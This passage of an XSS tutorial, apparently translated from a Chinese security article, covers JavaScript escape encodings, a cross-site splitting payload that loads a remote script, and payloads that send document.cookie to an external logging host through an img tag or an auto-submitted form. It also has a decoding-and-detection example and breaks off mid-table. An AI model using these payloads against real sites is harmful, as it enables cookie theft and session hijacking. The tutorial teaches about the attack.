min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.3</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">JavaScript encoding</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: 
break-word !important;">JavaScript provides three character-encoding forms:</p><section style="margin: 0px; padding: 0px; max-width: 100%; font-size: 16px; font-family: 宋体; color: rgb(0, 0, 0); text-align: start; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 13px; font-family: Symbol; color: rgb(51, 51, 51);">·<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; font-size: 9px; line-height: normal;">&nbsp;&nbsp;</span></span><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(51, 51, 51);">JS Unicode escape, e.g. “e” is encoded as “\u0065”</span></span></section><section style="margin: 0px; padding: 0px; max-width: 100%; font-size: 16px; font-family: 宋体; color: rgb(0, 0, 0); text-align: start; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: Symbol; color: rgb(51, 51, 51);">·<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; line-height: normal;">&nbsp;&nbsp;</span></span><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box 
!important; overflow-wrap: break-word !important; color: rgb(51, 51, 51);">JS hexadecimal escape, e.g. “e” is encoded as “\x65”</span></span></section><section style="margin: 0px; padding: 0px; max-width: 100%; font-size: 16px; font-family: 宋体; color: rgb(0, 0, 0); text-align: start; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;"><span style="margin: 0px; padding: 0px; max-width: 100%; font-family: Symbol; color: rgb(51, 51, 51); box-sizing: border-box !important; overflow-wrap: break-word !important;">·<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-variant-numeric: normal; font-variant-east-asian: normal; font-stretch: normal; line-height: normal;">&nbsp;&nbsp;</span></span><span style="margin: 0px; padding: 0px; max-width: 100%; color: rgb(51, 51, 51); box-sizing: border-box !important; overflow-wrap: break-word !important;">JS octal escape, e.g. “e” is encoded as “\145”</span></span></section><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: 
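break-word !important;"></section></section>
<p>Every encoded form above, the HTML numeric character references and the three JavaScript escapes of 4.3 alike, decodes to the same script, which is why a filter that inspects the raw input misses all of them. The JavaScript below is an added example and not code from the original article: it canonicalises HTML numeric references (decimal and hexadecimal, with or without the trailing semicolon, with leading zeros) and the \u, \x and octal JavaScript escapes, repeats until the text stops changing, and then applies a small pattern list to both the raw and the decoded text. The pattern list, the <code>looksLikeXss</code> function and the sample inputs are this example's own; the same comparison is what a WAF or input filter has to do before any pattern match is meaningful.</p>

```javascript
// Added example (not from the original article): canonicalise the HTML numeric
// character references and JavaScript string escapes shown above, then run a
// detection pattern over raw and decoded text. Sample inputs are constructed.

// Decode HTML numeric character references: &#97; &#x61; with or without the
// trailing semicolon and with any number of leading zeros (&#000097;).
function decodeHtmlNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, body) => {
    const cp = body[0].toLowerCase() === 'x'
      ? parseInt(body.slice(1), 16)
      : parseInt(body, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Decode the three JavaScript escape forms listed in 4.3: \u0065, \x65 and the
// octal \145 (plus the ES2015 \u{...} form).
function decodeJsEscapes(s) {
  return s
    .replace(/\\u\{([0-9a-f]+)\}/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)));
}

// Apply both decoders until the text stops changing, so that an entity that
// decodes to a backslash escape (or the reverse) is unwrapped as well.
function canonicalise(s, maxRounds = 5) {
  let prev = s;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeJsEscapes(decodeHtmlNumericEntities(prev));
    if (next === prev) return next;
    prev = next;
  }
  return prev;
}

// This example's own pattern list (a real defence is context-aware output
// encoding, not a blacklist). The point is the comparison: the same patterns
// applied before and after canonicalisation.
const SUSPICIOUS = [/alert\s*\(/i, /javascript\s*:/i];

function looksLikeXss(input) {
  const raw = SUSPICIOUS.some((re) => re.test(input));
  const decoded = SUSPICIOUS.some((re) => re.test(canonicalise(input)));
  return { raw, decoded };
}

// Constructed samples: the three img payloads and the href payload from above,
// plus the three JavaScript escape forms applied to alert(1).
const SAMPLES = [
  '<img src=1 onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">',
  '<img src=1 onerror=&#97&#108&#101&#114&#116&#40&#49&#41>',
  '<img src=1 onerror="&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000049;&#000041;">',
  '<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">aaaa</a>',
  '\\u0061\\u006c\\u0065\\u0072\\u0074(1)',
  '\\x61\\x6c\\x65\\x72\\x74(1)',
  '\\141\\154\\145\\162\\164(1)',
];

// True when every sample is missed on the raw text and caught on the canonical text.
function allCaughtOnlyAfterDecoding(samples = SAMPLES) {
  return samples.every((s) => {
    const r = looksLikeXss(s);
    return r.raw === false && r.decoded === true;
  });
}

for (const s of SAMPLES) {
  console.log(JSON.stringify(looksLikeXss(s)), 'canonical:', canonicalise(s));
}
```

<p>Run under Node; each sample prints <code>{"raw":false,"decoded":true}</code> beside its canonical form. The fixed-point loop matters more than it looks: a single decoding pass would miss an entity such as <code>&#92;</code> that only becomes a backslash escape after the first round.</p>
<section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: 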
break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.4</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 
100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">Cross-site splitting</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Security researcher “剑心” found an XSS vulnerability on a website, in the contact field of the comment form. The catch: that field accepted only 30 characters, and the mandatory <script></script> already takes 17 of them, leaving just 13 to work with, so this XSS could do no more than pop an alert box.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Fortunately, the comment section allowed repeated submissions, that is, several script tags could be posted, so ‘剑心’ cleverly constructed the following XSS exploit code.</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; 
white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><script>z='document.'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'write("'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'<script'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+' src=ht'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'tp://ww'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'w.shell'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'.net/1.'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'js></sc'</script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>z=z+'ript>")'</script><br style="margin: 0px; 
padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script>eval(z)</script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">The code above introduces a string variable z and splits the following code into pieces, each one short enough to fit the 30-character field together with its <script></script> wrapper.</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; 
font-size: 14px; line-height: 2; letter-spacing: 0.5px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">document.write("<script src=http://www.shell.net/1.js></script>")</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">The pieces are appended to z over several submissions, and finally eval(z) neatly executes the assembled code.</p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H30Ic.png" title="XSS漏洞挖掘之跨站脚本攻击(图1)" alt="XSS漏洞挖掘之跨站脚本攻击(图1)"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H324F4.png" title="XSS漏洞挖掘之跨站脚本攻击(图2)" alt="XSS漏洞挖掘之跨站脚本攻击(图2)"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H340495.png" title="XSS漏洞挖掘之跨站脚本攻击(图3)" alt="XSS漏洞挖掘之跨站脚本攻击(图3)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: 
-apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 0.5px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2 Sending the cookie</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.1 Using the img tag (most common)</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Just replace alert(1) with the following payload:</p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 577.778px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: 
border-box; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">var img=document.createElement("img"); // create an img element node</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">img.src="http://www.nsf-test-xss.com/log?cookie="+escape(document.cookie); // set the src attribute</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">document.body.appendChild(img); // append it under the body node</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; line-height: 2; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.2 Using a form</strong></p></section><p></p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); 
overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><form id="x" action="http://www.nsf-test-xss.com/log"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><input id="i" type="hidden" value="" name="y" /><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></form><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/><script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>var a = escape(document.cookie);<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.getElementById("i").value=a; // read the cookie and put it in value<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.getElementById("x").submit(); // submit the form<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", 
"Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 0.5px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">As you can see, the page navigates to the attacker's site, which is obviously inconvenient for the attacker.</p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H403459.png" title="XSS漏洞挖掘之跨站脚本攻击(图4)" alt="XSS漏洞挖掘之跨站脚本攻击(图4)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.3 Sending with Ajax</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">Ajax stands for Asynchronous JavaScript and XML. Ajax is not a new language; it uses existing JavaScript syntax. Put simply, Ajax is a souped-up JS form.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br 
style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">Ajax can update parts of a page without reloading the whole page, and it can transfer data in the background without affecting what the user sees.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">XMLHttpRequest is a browser interface that lets JavaScript perform HTTP(S) communication.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><table cellspacing="0" cellpadding="0" width="676"><thead style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><tr style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;" class="firstRow"><td width="106" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important; border-width: 1px;"><br/></td><td width="225.66666666666666" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-style: solid; border-color: gainsboro; border-width: 1px; 
max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; text-align: center; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 12px;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">IE</strong></span></p></td><td width="166.00000000000003" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-style: solid; border-color: gainsboro; border-width: 1px; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; text-align: center; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">Chrome</strong></p></td></tr></thead><tbody style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><tr style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"><td width="106" style="margin: 0px; padding: 6px 13px; word-break: break-all; border-width: 1px; border-style: solid; border-color: gainsboro; max-width: 100%; overflow-wrap: break-word !important; box-sizing: border-box !important;"><p style="max-width: 100%; clear: both; min-height: 1em; font-size: 16px; font-family: 宋体; box-sizing: border-box !important; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 
